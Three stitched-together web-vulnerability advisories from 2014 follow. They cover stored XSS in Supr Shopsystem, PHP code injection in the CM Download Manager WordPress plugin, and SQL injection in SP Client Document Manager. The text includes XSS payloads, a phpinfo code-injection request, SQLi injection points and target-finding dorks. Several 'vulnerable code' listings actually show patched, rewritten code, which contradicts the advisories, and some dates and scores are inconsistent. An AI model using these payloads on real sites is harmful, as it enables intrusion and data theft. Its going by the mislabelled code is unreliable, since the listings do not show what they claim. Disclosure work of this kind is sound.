SUPR is a modern and user-friendly system which allows each store very quickly and easily create their own online store. 
Without installation and own webspace you can begin to create products and content right after the registration. With our 
free designs and the great customization options you can customize and adapt to your ideas your shop. You have to be an 
expert to work with the SUPR Shop.
 
( Copy of the Vendor Homepage: http://de.supr.com/tour )
 
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a persistent input validation vulnerability in the official Supr Shopsystem v5.1.0 web-application.
 
 
Vulnerability Disclosure Timeline:
==================================
2014-11-05:  Public Disclosure (Vulnerability Laboratory)
 
Discovery Status:
=================
Published
 
Affected Product(s):
====================
Supreme NewMedia GmbH
Product: Supr - Shopsystem Web Application 5.1.0
 
Exploitation Technique:
=======================
Remote
 
Severity Level:
===============
Medium
 
Technical Details & Description:
================================
An application-side input validation web vulnerability has been discovered in the official Supr Shopsystem v5.1.0 web-application.
The vulnerability can be exploited by remote attackers to execute persistent script code through forced client-side browser requests against a non-expired session, or locally by injecting into the POST request.
 
The vulnerability is located in the blogname, shop slogan and tags input fields of the Dashboard > Settings > General > (setting_shopdetail) module.
Remote attackers are able to prepare client-side requests with malicious context to take over administrator accounts on interaction (click link). 
Local attackers with privileged user accounts are also able to inject own script codes locally by manipulation of the vulnerable setting_shopdetail 
POST method request. The injected code executes before the error/exception handling that should have blocked it, so that check is bypassed.
 
The error/exception handling is evaded because the request goes through and the injected value is processed before the exception can prevent its execution.
Remote attackers are able to prepare a post request that allows to execute the code in one shot through the same origin policy. The request can be injected locally to reproduce or as prepare POST request that manipulates the values when a non expired session clicks for example a manipulated link.
 
The security risk of the application-side web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.2.
Exploitation of the application-side web vulnerability requires a low privileged web-application user account and low user interaction.
Successful exploitation of the vulnerabilities result in persistent phishing mails, session hijacking, persistent external redirect to malicious sources and application-side manipulation of affected or connected module context.
 
Request Method(s):
          [+] POST
 
Vulnerable Module(s):
          [+] Dashboard > Settings > General > (setting_shopdetail)
 
Vulnerable Parameter(s):
          [+] blogname
          [+] blog/shop slogan
          [+] tags
 
Affected Module(s):
          [+] Dashboard (localhost:80/a/wp-admin/[x])
 
 
Proof of Concept (PoC):
=======================
The application-side vulnerability can be exploited by remote attackers with low privileged application user account and low user interaction click.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
 
PoC: Dashboard > Settings > General > (setting_shopdetail)
 
<form id="setting_shopdetail" name="setting_shopdetail" method="post" action="">
                                <div class="form-row field-error">
                    <div class="label">
                        <label for="setting_shopdata_blogname" class="mandatory">Shopname</label>
                    </div>
                    <div class="field">
<input id="setting_shopdata_blogname" name="setting_shopdata[blogname]" value="" type="text"><[PERSISTENT INJECTED SCRIPT CODE!];)" <"="">
 
<ul class="">
    <li class="error">Das Feld <strong>Shopname</strong> enthält leider ungültige Zeichen!</li>
</ul></div>
 
Note: The error class with the exception will be evaded because of the request that went through and executes earlier then the exception prevents the execute.
Remote attackers are able to prepare a post request that allows to execute the code in one shot through the same origin policy. The request can be injected locally to reproduce or as prepare POST request that manipulates the values when a non expired session clicks for example a manipulated link.
 
 
--- PoC Session Logs [POST] ---
Status: 200[OK]
 POST https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/admin.php?route=/setting/shopdata 
Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[-1] Mime Type[text/html]
   Request Header:
      Host[localhost:80]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/admin.php?route=/setting/shopdata]
      Cookie[PHPSESSID=ugqds8368sctjctkj1ldv34pu1; PHPSESSID=ugqds8368sctjctkj1ldv34pu1; __utma=182188197.576119580.1414780466.1414783994.1414786850.3; 
__utmc=182188197; __utmz=182188197.1414780466.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=ugqds8368sctjctkj1ldv34pu1; 
wordpress_sec_7bb63ff3c3ab7632bd8ee766293ae7eb=62ee207ef606cef58c93695d44c2f01e45ff19bd%7C1415993606%7C9555fc6c5a1ac4e4c05dacbb0d9dcd47; 
wordpress_logged_in_7bb63ff3c3ab7632bd8ee766293ae7eb=62ee207ef606cef58c93695d44c2f01e45ff19bd%7C1415993606%7C9fc5b243fde7af93c9fce527e94da34f;
 _ga=GA1.2.576119580.1414780466; _pk_id.9.44c1=298ac1e6c0a22deb.1414784009.1.1414784081.1414784009.; __utma=1.576119580.1414780466.1414786842.1414786842.1; 
__utmb=1.4.10.1414786842; __utmc=1; __utmz=1.1414786842.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; wp-settings-time-29002=1414787115;
 __utmb=182188197.24.10.1414786850]
      Connection[keep-alive]
      Cache-Control[max-age=0]
   POST-Daten:
      setting_shopdata%5Bblogname%5D[%22%3E%3C[PERSISTENT INJECTED SCRIPT CODE!]%28%22VL%22%29+%3C]
      setting_shopdata%5Bblogdescription%5D[Shop+Slogan+%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C]
      shopreg%5Bshoplang%5D[de_DE]
      setting_shopdata%5Bshoplang%5D[de_DE]
      setting_shopdata%5Bshopcategory%5D[]
      setting_shopdata%5Bshopdesc%5D[%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C]
      setting_shopdata%5Bshoptags%5D[%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C]
      setting_shopdata%5Bemailfooter%5D[]
      setting_shopdata%5Binvoicenote%5D[]
      setting_shopdata%5Bshop_google_analytics_account%5D[]
      setting_shopdata%5Bshop_google_webmastertools_verification_code%5D[]
      setting_shopdata%5Bsubmit%5D[save]
   Response Header:
      Date[Fri, 31 Oct 2014 20:25:22 GMT]
      Server[Apache/2.2.16 (Debian)]
      X-Powered-By[PHP/5.3.3-7+squeeze22]
      p3p[CP="CAO PSA OUR"]
      Expires[Wed, 11 Jan 1984 05:00:00 GMT]
      Cache-Control[no-cache, must-revalidate, max-age=0, no-cache]
      Set-Cookie[PHPSESSID=ugqds8368sctjctkj1ldv34pu1
wp-settings-29002=deleted; expires=Thu, 31-Oct-2013 20:25:22 GMT; path=/
wp-settings-time-29002=1414787123; expires=Sat, 31-Oct-2015 20:25:23 GMT; path=/]
      Pragma[no-cache]
      X-Frame-Options[SAMEORIGIN]
      Connection[close]
      Content-Type[text/html; charset=UTF-8]
--
Status: 200[OK] 
GET https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/[PERSISTENT INJECTED SCRIPT CODE!] 
Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[283] Mime Type[text/html]
   Request Header:
      Host[localhost:80]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/admin.php?route=/setting/shopdata]
      Cookie[PHPSESSID=ugqds8368sctjctkj1ldv34pu1; PHPSESSID=ugqds8368sctjctkj1ldv34pu1; __utma=182188197.576119580.1414780466.1414783994.1414786850.3;
 __utmc=182188197; __utmz=182188197.1414780466.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=ugqds8368sctjctkj1ldv34pu1;
 wordpress_sec_7bb63ff3c3ab7632bd8ee766293ae7eb=62ee207ef606cef58c93695d44c2f01e45ff19bd%7C1415993606%7C9555fc6c5a1ac4e4c05dacbb0d9dcd47; 
wordpress_logged_in_7bb63ff3c3ab7632bd8ee766293ae7eb=62ee207ef606cef58c93695d44c2f01e45ff19bd%7C1415993606%7C9fc5b243fde7af93c9fce527e94da34f;
 _ga=GA1.2.576119580.1414780466; _pk_id.9.44c1=298ac1e6c0a22deb.1414784009.1.1414784081.1414784009.; __utma=1.576119580.1414780466.1414786842.1414786842.1;
 __utmb=1.4.10.1414786842; __utmc=1; __utmz=1.1414786842.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; wp-settings-time-29002=1414787123; __utmb=182188197.24.10.1414786850]
      Connection[keep-alive]
      Cache-Control[max-age=0]
   Response Header:
      Date[Fri, 31 Oct 2014 20:25:24 GMT]
      Server[Apache/2.2.16 (Debian)]
      Content-Length[283]
      Keep-Alive[timeout=5, max=8]
      Connection[Keep-Alive]
      Content-Type[text/html; charset=iso-8859-1]
 
 
Reference(s):
https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/admin.php?route=/setting/shopdata
https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/admin.php
https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/[x]
 
 
Solution - Fix & Patch:
=======================
The vulnerability can be patched by securely parsing and encoding the setting_shopdetail values from the POST request, and by encoding those values again wherever the dashboard renders them.
Restrict the input fields of the tags, blogname and blog slogan to prevent persistent script code injection attacks.
Setup the error exception above to the input mask and reconfigure it to capture the events correctly.
 
 
Security Risk:
==============
The security risk of the persistent input validation web vulnerability in the shopsystem is estimated as medium. (CVSS 3.1)
 
 
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
 
 
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for 
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, 
policies, deface websites, hack into databases or trade with fraud/stolen material.
 
Domains:    www.vulnerability-lab.com     - www.vuln-lab.com                 - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com   - research@vulnerability-lab.com              - admin@evolution-sec.com
Section:    magazine.vulnerability-db.com  - vulnerability-lab.com/contact.php             - evolution-sec.com/contact
Social:      twitter.com/#!/vuln_lab     - facebook.com/VulnerabilityLab              - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php  - vulnerability-lab.com/rss/rss_upcoming.php       - vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php    - vulnerability-lab.com/list-of-bug-bounty-programs.php  - vulnerability-lab.com/register/
 
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
 
        Copyright © 2014 | Vulnerability Laboratory - [Evolution Security GmbH]™
 
 
 
 
-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
 
COMPANY: Evolution Security GmbH
BUSINESS: www.evolution-sec.com



WordPress CM Download Manager 2.0.0 Code Injection

Vulnerability title: Code Injection in Wordpress CM Download Manager plugin
CVE: CVE-2014-8877 
Plugin: CM Download Manager plugin
Vendor: CreativeMinds - https://www.cminds.com/
Product: https://wordpress.org/plugins/cm-download-manager/
Affected version: 2.0.0 and previous version
Fixed version: 2.0.4
Google dork: inurl:cmdownloads
Reported by: Phi Le Ngoc - phi.n.le@itas.vn
Credits to ITAS Team - www.itas.vn
 
 
::DESCRIPTION::
 
The code injection vulnerability has been found and confirmed within the software as an anonymous user. A successful attack could allow an anonymous attacker to gain full control of the application and to use any operating system functions that are available to the scripting environment.
 
GET /cmdownloads/?CMDsearch=".phpinfo()." HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: _ga=GA1.2.1698795018.1415614778; _gat=1; PHPSESSID=okt6c51s4esif2qjq451ati7m6; cmdm_disclaimer=Y; JSB=1415614988879 
Connection: keep-alive
 
Vulnerable file:/wp-content/plugins/cm-download-manager/lib/controllers/CmdownloadController.php
Vulnerable code: (Line: 130 -> 158)
 
 
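public static function alterSearchQuery($search, $query)
{
    /*
     * Rewrite the WP_Query search clause from the CMDsearch request parameter.
     *
     * @param string   $search  The SQL search clause WordPress has built so far.
     * @param WP_Query $query   The query being filtered.
     * @return string  The search clause, replaced when a CMDsearch term applies.
     *
     * Fix relative to the snippet quoted in the advisory: the raw term used to be
     * spliced into PHP source through create_function(), so a crafted request value
     * was executed as code. It is now captured by a closure as plain data. The SQL
     * side was already escaped with esc_sql(like_escape()) and is unchanged.
     */
    $applies = isset($query->query_vars['post_type'])
        && $query->query_vars['post_type'] == CMDM_GroupDownloadPage::POST_TYPE
        && (!isset($query->query_vars['widget']) || $query->query_vars['widget'] !== true)
        && !$query->is_single
        && !$query->is_404
        && !$query->is_author
        && isset($_GET['CMDsearch']);
    if (!$applies) {
        return $search;
    }

    global $wpdb;
    $search_term = $_GET['CMDsearch'];
    if (empty($search_term)) {
        return $search;
    }

    $search = '';
    $query->is_search = true;
    // Added slashes interfere with quote grouping if stripped early, so strip them here.
    $search_term = stripslashes($search_term);
    preg_match_all('/".*?("|$)|((?<=[\r\n\t ",+])|^)[^\r\n\t ",+]+/', $search_term, $matches);
    $terms = array_map('_search_terms_tidy', $matches[0]);

    $n = '%';
    $searchand = ' AND ';
    foreach ((array) $terms as $term) {
        // like_escape() is deprecated in favour of $wpdb->esc_like() in newer WordPress;
        // kept here to match the original's compatibility range.
        $term = esc_sql(like_escape($term));
        $search .= "{$searchand}(($wpdb->posts.post_title LIKE '{$n}{$term}{$n}') OR ($wpdb->posts.post_content LIKE '{$n}{$term}{$n}'))";
    }

    // Closure instead of create_function(): $search_term is bound as a value and never
    // evaluated as PHP source.
    add_filter('get_search_query', function ($q) use ($search_term) {
        return $search_term;
    }, 99, 1);
    remove_filter('posts_request', 'relevanssi_prevent_default_request');
    remove_filter('the_posts', 'relevanssi_query');

    return $search;
}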
 
::SOLUTION::
Update to version 2.0.4
 
::DISCLOSURE::
2014-11-08 initial vendor contact
2014-11-10 vendor response
2014-11-10 vendor confirmed 
2014-11-11 vendor release patch
2014-11-14 public disclosure
 
::REFERENCE::
https://downloadsmanager.cminds.com/release-notes/
http://www.itas.vn/news/code-injection-in-cm-download-manager-plugin-66.html?language=en
 
 
::COPYRIGHT::
Copyright (c) ITAS CORP 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of ITAS CORP.
 
::DISCLAIMER::
THE INFORMATION PRESENTED HEREIN IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY IMPLIED WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATION OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE AS IS, AND AT THE USER'S OWN RISK.



WordPress SP Client Document Manager 2.4.1 SQL Injection

Vulnerability title: Multiple SQL Injection in SP Client Document Manager plugin
Plugin: SP Client Document Manager
Vendor: http://smartypantsplugins.com
Product: https://wordpress.org/plugins/sp-client-document-manager/
Affected version: version 2.4.1 and previous version
Fixed version: N/A
Google dork: inurl:wp-content/plugins/sp-client-document-manager
Reported by: Dang Quoc Thai - thai.q.dang (at) itas (dot) vn
Credits to ITAS Team - www.itas.vn
 
 
::DESCRIPTION::
 
Multiple SQL injection vulnerabilities have been found and confirmed within the software as an anonymous user. A successful attack could allow an anonymous attacker to access information such as usernames and password hashes stored in the database. The following URLs and parameters have been confirmed to suffer from SQL injection: 
 
Link 1:
 
POST /wordpress/wp-content/plugins/sp-client-document-manager/ajax.php?function=email-vendor HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://target.org/wordpress/?page_id=16
Cookie: wordpress_cbbb3ecca6306be6e41d05424d417f7b=test1%7C1414550777%7CxKIQf1812x9lfyhuFgNQQhmDtojDdEnDTfLisVHwnJ6%7Cc493b6c21a4a1916e2bc6076600939af5276b6feb09d06ecc043c37bd92a0748; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_cbbb3ecca6306be6e41d05424d417f7b=test1%7C1414550777%7CxKIQf1812x9lfyhuFgNQQhmDtojDdEnDTfLisVHwnJ6%7C7995fe13b1bbe0761cb05258e4e13b20b27cc9cedf3bc337440672353309e8a3; bp-activity-oldestpage=1
Connection: keep-alive
Content-Length: 33
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 
vendor_email[]=<SQL Injection>
 
 
Vulnerable file:/wp-content/plugins/sp-client-document-manager/classes/ajax.php
Vulnerable code: (Line: 1516 -> 1530)
    function email_vendor()
    {
        // Snippet as quoted by the advisory (ajax.php lines 1516-1530): it is cut off after the
        // query, so the rest of the function is not shown here.
        global $wpdb, $current_user;
        if (count($_POST['vendor_email']) == 0) {
            echo '<p style="color:red;font-weight:bold">' . __("Please select at least one file!", "sp-cdm") . '</p>';
        } else {
            // Injection point: every $_POST['vendor_email'][] value is joined verbatim into the
            // IN (...) list with no casting and no $wpdb->prepare().
            $files = implode(",", $_POST['vendor_email']);
            // Debug output left in: the raw SQL is echoed into the HTTP response, disclosing the
            // table prefix and the query shape to the caller.
            echo "SELECT *  FROM " . $wpdb->prefix . "sp_cu  WHERE id IN (" . $files . ")"."\n";
            $r     = $wpdb->get_results("SELECT *  FROM " . $wpdb->prefix . "sp_cu  WHERE id IN (" . $files . ")", ARRAY_A);
 
 
 
Link 2: http://target.org/wordpress/wp-content/plugins/sp-client-document-manager/ajax.php?function=download-project&id=<SQL Injection>
 
GET /wp-content/plugins/sp-client-document-manager/ajax.php?function=download-project&id=<SQL Injection> HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=4f7eca4e8ea50fadba7209e47494f29c
Connection: keep-alive
 
Vulnerable file:/wp-content/plugins/sp-client-document-manager/classes/ajax.php
Vulnerable code: (Line: 1462 -> 1479)
 
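function download_project()
    {
        /*
         * Zip every file of one project and redirect the client to the archive.
         *
         * The project id comes from $_GET['id']. The version quoted in the advisory
         * interpolated the raw value into two queries; it is now required to be numeric,
         * cast to int and bound through $wpdb->prepare(). The later directory/URL
         * concatenation therefore never sees request-controlled text either.
         *
         * NOTE(review): no capability, nonce or ownership check is visible in this
         * function; confirm the dispatcher in ajax.php enforces one before it runs.
         */
        global $wpdb;
        if (!isset($_GET['id']) || !is_numeric($_GET['id'])) {
            return;
        }
        $user_ID = (int) $_GET['id'];

        $r = $wpdb->get_results(
            $wpdb->prepare("SELECT * FROM {$wpdb->prefix}sp_cu WHERE pid = %d ORDER BY date DESC", $user_ID),
            ARRAY_A
        );
        $r_project = $wpdb->get_results(
            $wpdb->prepare("SELECT * FROM {$wpdb->prefix}sp_cu_project WHERE id = %d", $user_ID),
            ARRAY_A
        );
        if (empty($r_project)) {
            // Unknown project id: nothing to archive, and avoids notices on $r_project[0].
            return;
        }

        $return_file = preg_replace('/[^\w\d_ -]/si', '', stripslashes($r_project[0]['name'])) . ".zip";
        $zip  = new Zip();
        $dir  = SP_CDM_UPLOADS_DIR . $r_project[0]['uid'] . '/';
        $path = SP_CDM_UPLOADS_DIR_URL . $r_project[0]['uid'] . '/';
        foreach ((array) $r as $row) {
            $file = $dir . $row['file'];
            $zip->addFile(file_get_contents($file), $row['file'], filectime($file));
        }
        // Neither getZipData() nor getZipFile() is used, so finalize explicitly before writing.
        $zip->finalize();
        $zip->setZipFile($dir . $return_file);
        header("Location: " . $path . $return_file);
    }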
 
Link 3: http://target.org/wordpress/wp-content/plugins/sp-client-document-manager/ajax.php?function=download-archive&id=<SQL Injection>
 
GET /wp-content/plugins/sp-client-document-manager/ajax.php?function=download-archive&id=<SQL Injection> HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=4f7eca4e8ea50fadba7209e47494f29c
Connection: keep-alive
Vulnerable file:/wp-content/plugins/sp-client-document-manager/classes/ajax.php
Vulnerable code: (Line: 1480 -> 1496)
 
 
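function download_archive()
    {
        /*
         * Zip every file owned by one user id and redirect the client to the archive.
         *
         * The user id comes from $_GET['id']. In the version quoted in the advisory the
         * raw value was both interpolated into the SELECT and concatenated into the
         * upload directory and URL. It is now required to be numeric, cast to int and
         * bound through $wpdb->prepare(), which closes the SQL injection and also keeps
         * request-controlled text out of the filesystem path.
         *
         * NOTE(review): no capability, nonce or ownership check is visible in this
         * function; confirm the dispatcher in ajax.php enforces one before it runs.
         */
        global $wpdb;
        if (!isset($_GET['id']) || !is_numeric($_GET['id'])) {
            return;
        }
        $user_ID = (int) $_GET['id'];

        $dir  = SP_CDM_UPLOADS_DIR . $user_ID . '/';
        $path = SP_CDM_UPLOADS_DIR_URL . $user_ID . '/';
        $return_file = "Account.zip";
        $zip  = new Zip();
        $r = $wpdb->get_results(
            $wpdb->prepare("SELECT * FROM {$wpdb->prefix}sp_cu WHERE uid = %d ORDER BY date DESC", $user_ID),
            ARRAY_A
        );
        foreach ((array) $r as $row) {
            $file = $dir . $row['file'];
            $zip->addFile(file_get_contents($file), $row['file'], filectime($file));
        }
        // Neither getZipData() nor getZipFile() is used, so finalize explicitly before writing.
        $zip->finalize();
        $zip->setZipFile($dir . $return_file);
        header("Location: " . $path . $return_file);
    }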
 
Link 4: http://target.org/wordpress/wp-content/plugins/sp-client-document-manager/ajax.php?function=remove-category&id=<SQL Injection>
 
GET /wp-content/plugins/sp-client-document-manager/ajax.php?function=remove-category&id=<SQL Injection> HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=4f7eca4e8ea50fadba7209e47494f29c
Connection: keep-alive
Vulnerable file:/wp-content/plugins/sp-client-document-manager/classes/ajax.php
Vulnerable code: (Line: 1480 -> 1496)
 
Vulnerable file:/wp-content/plugins/sp-client-document-manager/classes/ajax.php
Vulnerable code: (Line: 368 -> 372)
 
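    function remove_cat()
    {
        /*
         * Delete one project row and every file row that references it.
         *
         * The id comes from $_REQUEST['id']. The version quoted in the advisory
         * concatenated the raw value into both DELETE statements; it is now required
         * to be numeric, cast to int and bound through $wpdb->prepare(). A missing or
         * non-numeric id deletes nothing.
         *
         * NOTE(review): no capability or nonce check is visible here; confirm the
         * caller performs one before this destructive action.
         */
        global $wpdb;
        if (!isset($_REQUEST['id']) || !is_numeric($_REQUEST['id'])) {
            return;
        }
        $id = (int) $_REQUEST['id'];
        $wpdb->query($wpdb->prepare("DELETE FROM {$wpdb->prefix}sp_cu_project WHERE id = %d", $id));
        $wpdb->query($wpdb->prepare("DELETE FROM {$wpdb->prefix}sp_cu WHERE pid = %d", $id));
    }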
 
 
::DISCLOSURE::
+ 10/30/2014: Notified vendor - vendor did not respond
+ 11/08/2014: Notified vendor - vendor blocks IPs from Vietnam
+ 11/05/2014: Notified vendor - vendor did not respond
+ 11/20/2014: Public disclosure
 
::REFERENCE::
https://www.youtube.com/watch?v=AR3xCcuEJHc
 
 
::DISCLAIMER::
THE INFORMATION PRESENTED HEREIN IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY IMPLIED WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATION OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE AS IS, AND AT THE USER'S OWN RISK.
